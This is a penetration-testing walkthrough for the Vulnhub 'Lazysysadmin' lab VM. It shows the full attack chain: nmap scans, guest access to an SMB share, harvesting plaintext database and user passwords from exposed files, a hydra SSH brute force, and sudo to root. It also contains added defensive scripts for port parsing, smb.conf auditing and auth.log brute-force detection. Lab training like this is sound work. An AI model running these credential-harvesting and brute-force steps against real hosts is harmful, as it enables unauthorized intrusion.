Vulnhub: Lazysysadmin penetration-testing lab
Target discovery
Since the target VM sits on the same network, arp-scan can be used to discover it:
┌──(kali㉿kali)-[~/Work/vulnhub/Lazysysadmin]
└─$ sudo arp-scan 192.168.56.0/24
[sudo] kali 的密码:
Interface: eth0, type: EN10MB, MAC: 00:0c:29:6f:0f:9f, IPv4: 192.168.56.128
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1 00:50:56:c0:00:08 VMware, Inc.
192.168.56.2 00:50:56:fa:da:39 VMware, Inc.
192.168.56.135 00:0c:29:fa:ac:4b VMware, Inc.
192.168.56.254 00:50:56:ea:d8:46 VMware, Inc.
4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.963 seconds (130.41 hosts/sec). 4 responded
From the scan results the target should be 192.168.56.135. Next comes asset enumeration: find the open ports and identify the services behind them.
Information gathering
Open port information
Open-port identification:
┌──(kali㉿kali)-[~/Work/vulnhub/Lazysysadmin]
└─$ sudo nmap -sS -p- 192.168.56.135 --min-rate=10000 -oA ./nmap_result/open_ort_scan
Starting Nmap 7.95 ( https://nmap.org ) at 2026-05-03 10:34 EDT
Nmap scan report for 192.168.56.135
Host is up (0.0026s latency).
Not shown: 65529 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3306/tcp open mysql
6667/tcp open irc
MAC Address: 00:0C:29:FA:AC:4B (VMware)
Nmap done: 1 IP address (1 host up) scanned in 5.78 seconds
Detailed identification of the services on the open ports:
┌──(kali㉿kali)-[~/Work/vulnhub/Lazysysadmin]
└─$ cat nmap_result/open_ort_scan.nmap | grep /tcp | awk -F/ '{print $1}' | tr '\n' ','
22,80,139,445,3306,6667,
┌──(kali㉿kali)-[~/Work/vulnhub/Lazysysadmin]
└─$ sudo nmap -sS -sV -p22,80,139,445,3306,6667,2 -A 192.168.56.135 --min-rate=10000 -oA nmap_result/nmap_portserver
Starting Nmap 7.95 ( https://nmap.org ) at 2026-05-03 10:54 EDT
Nmap scan report for 192.168.56.135
Host is up (0.00058s latency).
PORT STATE SERVICE VERSION
2/tcp closed compressnet
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 b5:38:66:0f:a1:ee:cd:41:69:3b:82:cf:ad:a1:f7:13 (DSA)
| 2048 58:5a:63:69:d0:da:dd:51:cc:c1:6e:00:fd:7e:61:d0 (RSA)
| 256 61:30:f3:55:1a:0d:de:c8:6a:59:5b:c9:9c:b4:92:04 (ECDSA)
|_ 256 1f:65:c0:dd:15:e6:e4:21:f2:c1:9b:a3:b6:55:a0:45 (ED25519)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Backnode
|_http-generator: Silex v2.2.7
| http-robots.txt: 4 disallowed entries
|_/old/ /test/ /TR2/ /Backnode_files/
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
3306/tcp open mysql MySQL (unauthorized)
6667/tcp open irc InspIRCd
| irc-info:
| server: Admin.local
| users: 1
| servers: 1
| chans: 0
| lusers: 1
| lservers: 0
| source ident: nmap
| source host: 192.168.56.128
|_ error: Closing link: (nmap@192.168.56.128) [Client exited]
MAC Address: 00:0C:29:FA:AC:4B (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.14
Network Distance: 1 hop
Service Info: Hosts: LAZYSYSADMIN, Admin.local; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: lazysysadmin
| NetBIOS computer name: LAZYSYSADMIN\x00
| Domain name: \x00
| FQDN: lazysysadmin
|_ System time: 2026-05-04T00:55:09+10:00
|_clock-skew: mean: -3h20m00s, deviation: 5h46m23s, median: -1s
|_nbstat: NetBIOS name: LAZYSYSADMIN, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-time:
| date: 2026-05-03T14:55:08
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
TRACEROUTE
HOP RTT ADDRESS
1 0.58 ms 192.168.56.135
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.81 seconds
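A side note on the port-list pipeline above: `grep /tcp | awk | tr` also matches closed-port lines and leaves a trailing comma, and the second scan command ended up carrying a spurious port 2. The function below is an added example, not part of the original writeup; it reads nmap normal output (a constructed excerpt modelled on the scan above) and keeps only lines whose STATE column is open:

```shell
# Added example, not from the original writeup: build a clean comma-separated
# list of OPEN ports from nmap normal output (-oN / the .nmap file of -oA).
# The grep/awk/tr pipeline used above also matches closed-port lines and leaves
# a trailing comma; this filters on the STATE column and strips it.

# Constructed excerpt modelled on the walkthrough's scan (port 2 added as closed).
NMAP_SAMPLE='Nmap scan report for 192.168.56.135
Host is up (0.0026s latency).
PORT     STATE  SERVICE
2/tcp    closed compressnet
22/tcp   open   ssh
80/tcp   open   http
139/tcp  open   netbios-ssn
445/tcp  open   microsoft-ds
3306/tcp open   mysql
6667/tcp open   irc
MAC Address: 00:0C:29:FA:AC:4B (VMware)'

# open_ports: read nmap normal output on stdin, print "22,80,..." with no trailing comma.
open_ports() {
    awk '$1 ~ /^[0-9]+\/(tcp|udp)$/ && $2 == "open" {
             split($1, p, "/")
             ports = (ports == "" ? p[1] : ports "," p[1])
         }
         END { print ports }'
}

# open_port_count: number of open ports in the same input.
open_port_count() {
    awk '$1 ~ /^[0-9]+\/(tcp|udp)$/ && $2 == "open"' | wc -l | tr -d ' '
}

# Usage: printf '%s\n' "$NMAP_SAMPLE" | open_ports    # 22,80,139,445,3306,6667
```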
After tidying up, the following information is obtained:
| Port | Protocol | Service | Version / details | Risk focus | State |
|---|---|---|---|---|---|
| 22 | SSH | OpenSSH 6.6.1p1 | Ubuntu 2ubuntu2.8; supports DSA / RSA / ECDSA / ED25519 | Old version; weak algorithm (DSA-1024) | open |
| 80 | HTTP | Apache httpd 2.4.7 | Silex v2.2.7; robots.txt exposes /old/ /test/ /TR2/ /Backnode_files/ | High: robots.txt information disclosure, old Apache | open |
| 139 | NetBIOS | Samba smbd 3.X–4.X | workgroup WORKGROUP | Medium: used together with 445 for SMB exploitation | open |
| 445 | SMB | Samba 4.3.11-Ubuntu | Guest account usable; signing not enforced; workgroup WORKGROUP | High: anonymous access, signing disabled, share enumeration | open |
| 3306 | MySQL | MySQL | status unauthorized (unauthenticated direct connection not allowed) | High: exposed to the network, weak-password brute forcing | open |
| 6667 | IRC | InspIRCd | server Admin.local; 1 user currently online | Low: information disclosure, possible lateral movement | open |
Additional SMB information:
| Field | Value |
|---|---|
| OS (SMB) | Windows 6.1 / Samba 4.3.11-Ubuntu |
| Computer name | lazysysadmin |
| NetBIOS name | LAZYSYSADMIN |
| Domain name | (empty) |
| Message signing | disabled (dangerous; man-in-the-middle possible) |
| Guest account | enabled |
| Authentication level | user (challenge/response supported) |
Based on the scan results, the attack-surface priority is as follows:
- Hit SMB (445) first: a usable Guest account plus disabled signing. Start by enumerating shares with `smbclient -L //192.168.56.135 -N` and look for writable directories or sensitive files.
- Keep an eye on the web service (80) as well: robots.txt already lists several hidden directories; /old/ and /test/ are likely to hold leftover files and are worth a dirsearch pass.
- An externally exposed MySQL (3306) is fairly rare; try a passwordless login with `mysql -h 192.168.56.135 -u root`, or come back and reuse credentials once the web side yields something like a WordPress configuration file.
- Leave SSH (22) for later; it is not considered an entry point for now, but once credentials and a few usernames are in hand, password spraying becomes an option.
SMB (445)
Try enumerating with smbclient:
┌──(kali㉿kali)-[~/Work/vulnhub/Lazysysadmin]
└─$ smbclient -L //192.168.56.135 -N
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
share$ Disk Sumshare
IPC$ IPC IPC Service (Web server)
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP
┌──(kali㉿kali)-[~/Work/vulnhub/Lazysysadmin]
└─$ smbclient //192.168.56.135/share$ -N
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Tue Aug 15 07:05:52 2017
.. D 0 Mon Aug 14 08:34:47 2017
wordpress D 0 Tue Aug 15 07:21:08 2017
Backnode_files D 0 Mon Aug 14 08:08:26 2017
wp D 0 Tue Aug 15 06:51:23 2017
deets.txt N 139 Mon Aug 14 08:20:05 2017
robots.txt N 92 Mon Aug 14 08:36:14 2017
todolist.txt N 79 Mon Aug 14 08:39:56 2017
apache D 0 Mon Aug 14 08:35:19 2017
index.html N 36072 Sun Aug 6 01:02:15 2017
info.php N 20 Tue Aug 15 06:55:19 2017
test D 0 Mon Aug 14 08:35:10 2017
old D 0 Mon Aug 14 08:35:13 2017
3029776 blocks of size 1024. 1456464 blocks available
smb: \> cd wordpress\
smb: \wordpress\> get wp-config.php
getting file \wordpress\wp-config.php of size 3703 as wp-config.php (11.5 KiloBytes/sec) (average 11.5 KiloBytes/sec)
smb: \wordpress\> ls
. D 0 Tue Aug 15 07:21:08 2017
.. D 0 Tue Aug 15 07:05:52 2017
wp-config-sample.php N 2853 Wed Dec 16 04:58:26 2015
wp-trackback.php N 4513 Fri Oct 14 15:39:28 2016
wp-admin D 0 Wed Aug 2 17:02:02 2017
wp-settings.php N 16200 Thu Apr 6 14:01:42 2017
wp-blog-header.php N 364 Sat Dec 19 06:20:28 2015
index.php N 418 Tue Sep 24 20:18:11 2013
wp-cron.php N 3286 Sun May 24 13:26:25 2015
wp-links-opml.php N 2422 Sun Nov 20 21:46:30 2016
readme.html N 7413 Mon Dec 12 03:01:39 2016
wp-signup.php N 29924 Tue Jan 24 06:08:42 2017
wp-content D 0 Mon Aug 21 06:07:27 2017
license.txt N 19935 Mon Jan 2 12:58:42 2017
wp-mail.php N 8048 Wed Jan 11 00:13:43 2017
wp-activate.php N 5447 Tue Sep 27 17:36:28 2016
.htaccess H 35 Tue Aug 15 07:40:13 2017
xmlrpc.php N 3065 Wed Aug 31 12:31:29 2016
wp-login.php N 34327 Fri May 12 13:12:46 2017
wp-load.php N 3301 Mon Oct 24 23:15:30 2016
wp-comments-post.php N 1627 Mon Aug 29 08:00:32 2016
wp-config.php N 3703 Mon Aug 21 05:25:14 2017
wp-includes D 0 Wed Aug 2 17:02:03 2017
3029776 blocks of size 1024. 1456464 blocks available
smb: \> get deets.txt
getting file \deets.txt of size 139 as deets.txt (0.4 KiloBytes/sec) (average 6.1 KiloBytes/sec)
smb: \> get todolist.txt
getting file \todolist.txt of size 79 as todolist.txt (25.7 KiloBytes/sec) (average 6.2 KiloBytes/sec)
smb: \> get robots.txt
getting file \robots.txt of size 92 as robots.txt (44.9 KiloBytes/sec) (average 6.3 KiloBytes/sec)
So the share really is accessible as Guest, and it holds quite a lot. Downloading the files and reading them reveals a large amount of sensitive information:
┌──(kali㉿kali)-[~/Work/vulnhub/Lazysysadmin/smb]
└─$ ls
deets.txt robots.txt todolist.txt wp-config.php
┌──(kali㉿kali)-[~/Work/vulnhub/Lazysysadmin/smb]
└─$ cat deets.txt
CBF Remembering all these passwords.
Remember to remove this file and update your password after we push out the server.
Password 12345
┌──(kali㉿kali)-[~/Work/vulnhub/Lazysysadmin/smb]
└─$ cat robots.txt
User-agent: *
Disallow: /old/
Disallow: /test/
Disallow: /TR2/
Disallow: /Backnode_files/
┌──(kali㉿kali)-[~/Work/vulnhub/Lazysysadmin/smb]
└─$ cat todolist.txt
Prevent users from being able to view to web root using the local file browser
┌──(kali㉿kali)-[~/Work/vulnhub/Lazysysadmin/smb]
└─$ cat wp-config.php
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the
* installation. You don't have to use the web site, you can
* copy this file to "wp-config.php" and fill in the values.
*
* This file contains the following configurations:
*
* * MySQL settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://codex.wordpress.org/Editing_wp-config.php
*
* @package WordPress
*/
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');
/** MySQL database username */
define('DB_USER', 'Admin');
/** MySQL database password */
define('DB_PASSWORD', 'TogieMYSQL12345^^');
/** MySQL hostname */
define('DB_HOST', 'localhost');
/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');
/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');
/**#@+
* Authentication Unique Keys and Salts.
*
* Change these to different unique phrases!
* You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
* You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
*
* @since 2.6.0
*/
define('AUTH_KEY', 'SAq-)W,-K9tFcW(=?ro4SJ5)R.mx%+@KL-I@PB{<-i>g3n^1|E<-uN|}F;:PbMYJ');
define('SECURE_AUTH_KEY', 'u .o%Ld%m27waNqK+*`~&j6~v!d7vI|OwA|hd8%r#ri_`WRIcCN-KiTSWmk)1;xG');
define('LOGGED_IN_KEY', 'iX^NN~N7R5Mdmeh:$iLY60r~K[)^f5vk`wGDO30r8Ns)gA17FRt2|$#S!Lq@-<|`');
define('NONCE_KEY', ',_xAk=+)B7f_a|#J44}qWca!=`s4{C2.Xe>sY%4Ybd5*3z9WRH-ysm=.|Gm^McvU');
define('AUTH_SALT', '(:^<BWwzWYx ,f^9anxD,+V+2-&,VJ@@)U7CSzjv_MvD67>?05ihCG]Q1K:_7Xsa');
define('SECURE_AUTH_SALT', 'ud]}}0rWRMGZ+a`Hky G7|i|+c7YyH4=l#5{/1R=|]PYrOmN{&0JuqkO=o5vyGg5');
define('LOGGED_IN_SALT', '=M_DRp%vGmijIhl%K!(v>:,*RR<cl9ahav%{q`&I/0HD/$W/LK:mxR37PKh?Zzi8');
define('NONCE_SALT', 'ABOgE>G:U;Q/hO^>jBG5e96OL6+{=mV,|2S~c,~dhVa!E/&Q[Mc8#IgVTuXAI}sY');
;
/**#@-*/
/**
* WordPress Database Table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'wp_';
/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the Codex.
*
* @link https://codex.wordpress.org/Debugging_in_WordPress
*/
define('WP_DEBUG', false);
/* That's all, stop editing! Happy blogging. */
/** Absolute path to the WordPress directory. */
if ( !defined('ABSPATH') )
define('ABSPATH', dirname(__FILE__) . '/');
/* Dynamic site URL added by Togie */
$currenthost = "http://".$_SERVER['HTTP_HOST'];
$currentpath = preg_replace('@/+$@','',dirname($_SERVER['SCRIPT_NAME']));
$currentpath = preg_replace('/\/wp.+/','',$currentpath);
define('WP_HOME',$currenthost.$currentpath);
define('WP_SITEURL',$currenthost.$currentpath);
define('WP_CONTENT_URL', $currenthost.$currentpath.'/wp-content');
define('WP_PLUGIN_URL', $currenthost.$currentpath.'/wp-content/plugins');
define('DOMAIN_CURRENT_SITE', $currenthost.$currentpath );
@define('ADMIN_COOKIE_PATH', './');
/** Sets up WordPress vars and included files. */
require_once(ABSPATH . 'wp-settings.php');
PS: note that "deets" is English slang, short for "details"; colloquially it refers specifically to "juicy details" or "account information", as in:
"Spill the deets!" = "Tell me the details!"
So it is no surprise that the file does hold some important information.
These files yield a lot of useful information:
- Server credential: Password: 12345
- Database credentials: Admin:TogieMYSQL12345^^
- A person's name: Togie (from the comment in wp-config.php: /* Dynamic site URL added by Togie */)
- The directories listed in robots.txt
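From the defender's side, the two Samba findings above (guest access to share$ and unenforced signing) are both visible in smb.conf. The audit below is an added example, not from the original writeup; the smb.conf it inspects is constructed to resemble the target, with the share name and comment taken from the scan and every path and other value assumed:

```shell
# Added example, not from the original writeup: audit a Samba smb.conf for the
# weaknesses the scan surfaced: unknown users mapped to guest, SMB signing not
# mandatory, and shares that allow guest access. SMB_CONF is constructed; the
# share name and comment come from the scan, the paths and other values are assumed.
SMB_CONF='[global]
   workgroup = WORKGROUP
   map to guest = Bad User
   server signing = disabled

[print$]
   path = /var/lib/samba/printers
   guest ok = no

[share$]
   comment = Sumshare
   path = /var/www/html
   guest ok = yes'

# smb_value SECTION KEY: print the value of KEY in [SECTION] (case-insensitive), else nothing.
smb_value() {
    printf '%s\n' "$SMB_CONF" | awk -v sec="$1" -v key="$2" '
        /^[[:space:]]*\[/ { s = $0; sub(/^[[:space:]]*\[/, "", s); sub(/][[:space:]]*$/, "", s)
                            in_sec = (tolower(s) == tolower(sec)); next }
        in_sec && index($0, "=") {
            k = substr($0, 1, index($0, "=") - 1); v = substr($0, index($0, "=") + 1)
            gsub(/^[[:space:]]+|[[:space:]]+$/, "", k); gsub(/^[[:space:]]+|[[:space:]]+$/, "", v)
            if (tolower(k) == tolower(key)) { print v; exit }
        }'
}

# smb_findings: one line per weak setting found; no output means the checks passed.
smb_findings() {
    mtg=$(smb_value global 'map to guest' | tr 'A-Z' 'a-z')
    if [ -n "$mtg" ] && [ "$mtg" != "never" ]; then
        echo "global: map to guest = $mtg (unknown users become guest)"
    fi
    case "$(smb_value global 'server signing' | tr 'A-Z' 'a-z')" in
        mandatory|required) ;;
        *) echo "global: server signing is not mandatory (off by default on a non-DC)" ;;
    esac
    printf '%s\n' "$SMB_CONF" | sed -n 's/^[[:space:]]*\[\(.*\)\][[:space:]]*$/\1/p' |
        while read -r sec; do
            [ "$sec" = "global" ] && continue
            case "$(smb_value "$sec" 'guest ok' | tr 'A-Z' 'a-z')" in
                yes|true|1) echo "share [$sec]: guest ok = yes (anonymous read access)" ;;
            esac
        done
}
```

Running `smb_findings` against this config reports all three weaknesses; the fix is `map to guest = Never`, `server signing = mandatory` and `guest ok = no` on share$.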
Save these for SSH login attempts, admin-panel logins, password spraying and the like:
┌──(kali㉿kali)-[~/Work/vulnhub/Lazysysadmin]
└─$ cat >> name.txt << EOF
heredoc> admin
heredoc> Admin
heredoc> Password
heredoc> Togie
heredoc> togie
heredoc> EOF
┌──(kali㉿kali)-[~/Work/vulnhub/Lazysysadmin]
└─$ cat >> passwd.txt << EOF
heredoc> TogieMYSQL12345^^
heredoc> 12345
heredoc> EOF
SSH (22)
Attempt to log in with the credentials just obtained:
┌──(kali㉿kali)-[~/Work/vulnhub/Lazysysadmin]
└─$ hydra -L name.txt -P pass.txt 192.168.56.135 ssh
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-05-03 11:30:38
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 10 tasks per 1 server, overall 10 tasks, 10 login tries (l:5/p:2), ~1 try per task
[DATA] attacking ssh://192.168.56.135:22/
[22][ssh] host: 192.168.56.135 login: togie password: 12345
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2026-05-03 11:30:40
Password spraying yields an SSH account, togie; log in and check what privileges it has:
togie@LazySysAdmin:~$ whoami
togie
togie@LazySysAdmin:~$ sudo -l
[sudo] password for togie:
Matching Defaults entries for togie on LazySysAdmin:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User togie may run the following commands on LazySysAdmin:
(ALL : ALL) ALL
togie@LazySysAdmin:~$
The account has full sudo rights, so privilege escalation is simply a matter of using sudo.
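From the target's side, the hydra run above leaves a distinctive trace in /var/log/auth.log. The detection below is an added example, not from the original writeup; the log lines are constructed to mirror that run (ten attempts from 192.168.56.128 ending in one accepted login for togie) plus one unrelated key-based login from another host:

```shell
# Added example, not from the original writeup: spot a password-guessing burst
# against sshd in /var/log/auth.log. AUTH_LOG is constructed to mirror the hydra
# run above (5 users x 2 passwords from 192.168.56.128, the last attempt accepted
# for togie) plus one unrelated key-based login from another host.
AUTH_LOG='May  3 11:30:38 LazySysAdmin sshd[1201]: Failed password for invalid user admin from 192.168.56.128 port 40122 ssh2
May  3 11:30:38 LazySysAdmin sshd[1202]: Failed password for invalid user admin from 192.168.56.128 port 40124 ssh2
May  3 11:30:38 LazySysAdmin sshd[1203]: Failed password for invalid user Admin from 192.168.56.128 port 40126 ssh2
May  3 11:30:38 LazySysAdmin sshd[1204]: Failed password for invalid user Admin from 192.168.56.128 port 40128 ssh2
May  3 11:30:39 LazySysAdmin sshd[1205]: Failed password for invalid user Password from 192.168.56.128 port 40130 ssh2
May  3 11:30:39 LazySysAdmin sshd[1206]: Failed password for invalid user Password from 192.168.56.128 port 40132 ssh2
May  3 11:30:39 LazySysAdmin sshd[1207]: Failed password for invalid user Togie from 192.168.56.128 port 40134 ssh2
May  3 11:30:39 LazySysAdmin sshd[1208]: Failed password for invalid user Togie from 192.168.56.128 port 40136 ssh2
May  3 11:30:40 LazySysAdmin sshd[1209]: Failed password for togie from 192.168.56.128 port 40138 ssh2
May  3 11:30:40 LazySysAdmin sshd[1210]: Accepted password for togie from 192.168.56.128 port 40140 ssh2
May  3 11:32:01 LazySysAdmin sshd[1250]: Accepted publickey for ops from 192.168.56.1 port 51000 ssh2'

# failed_by_source: "<count> <ip>" per source address, most failures first.
failed_by_source() {
    printf '%s\n' "$AUTH_LOG" |
        awk '/sshd\[[0-9]+]: Failed password/ {
                 for (i = 1; i <= NF; i++) if ($i == "from") n[$(i + 1)]++
             }
             END { for (ip in n) print n[ip], ip }' | sort -rn
}

# brute_force_sources THRESHOLD: sources with at least THRESHOLD failures, noting
# whether the same source also has an accepted login (a likely successful guess).
brute_force_sources() {
    failed_by_source | while read -r count ip; do
        [ "$count" -ge "$1" ] || continue
        if printf '%s\n' "$AUTH_LOG" | grep -q "Accepted .* from $ip "; then
            echo "$ip failures=$count accepted=yes"
        else
            echo "$ip failures=$count accepted=no"
        fi
    done
}
```

On a real host, replace the embedded string with `cat /var/log/auth.log` and pair the alert with fail2ban or a lockout policy so a ten-guess burst never reaches a valid password.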
Privilege escalation and reading the flag
Escalate to root with sudo and read the flag:
togie@LazySysAdmin:~$ sudo -i
root@LazySysAdmin:~# whoami
root
root@LazySysAdmin:~# ls
proof.txt
root@LazySysAdmin:~# cat proof.txt
WX6k7NJtA8gfk*w5J3&T@*Ga6!0o5UP89hMVEQ#PT9851
Well done :)
Hope you learn't a few things along the way.
Regards,
Togie Mcdogie
Enjoy some random strings
WX6k7NJtA8gfk*w5J3&T@*Ga6!0o5UP89hMVEQ#PT9851
2d2v#X6x9%D6!DDf4xC1ds6YdOEjug3otDmc1$#slTET7
pf%&1nRpaj^68ZeV2St9GkdoDkj48Fl$MI97Zt2nebt02
bhO!5Je65B6Z0bhZhQ3W64wL65wonnQ$@yw%Zhy0U19pu
Summary
- When the nmap results show SMB running with both a usable Guest account and signing disabled, SMB is the service to try first.
- During information gathering, anything that looks like an operator's notes (to-do lists, records and the like) deserves a careful read, and anything resembling a person's name should be recorded for later stages of the attack.